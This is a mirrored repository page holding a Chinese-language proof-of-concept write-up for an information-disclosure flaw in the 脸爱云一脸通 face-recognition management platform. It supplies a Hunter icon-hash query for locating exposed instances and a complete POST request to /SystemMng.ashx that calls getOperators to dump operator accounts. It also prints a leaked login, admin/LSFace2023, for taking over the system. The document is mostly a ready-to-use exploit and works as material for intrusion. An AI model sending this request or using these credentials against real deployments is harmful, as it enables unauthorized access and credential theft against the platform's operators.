admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 19:35:52 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/脸爱云/脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.6 KiB
Raw Blame History

脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞

一、漏洞简介

脸爱云一脸通智慧管理平台是一套功能强大运行稳定操作简单方便用户界面美观轻松统计数据的一脸通系统。无需安装只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞。

二、影响版本

  • 脸爱云一脸通智慧管理平台

三、资产测绘

  • hunterweb.icon=="4f0be080512ee0b45fc90ff894b6ba60"
  • 特征

1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png

四、漏洞复现

POST /SystemMng.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Length: 91
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

page=1&arr_search=%7B%22username%22%3A%22%22%2C%22memo%22%3A%22%22%7D&funcName=getOperators

1714289895012-ee2f78c8-a94c-4a20-ad0c-e26a9fb89139.png

使用泄露的账号密码登录系统admin/LSFace2023

更新: 2024-04-28 15:39:23
原文: https://www.yuque.com/xiaokp7/ocvun2/qgkd6zg49i5orfef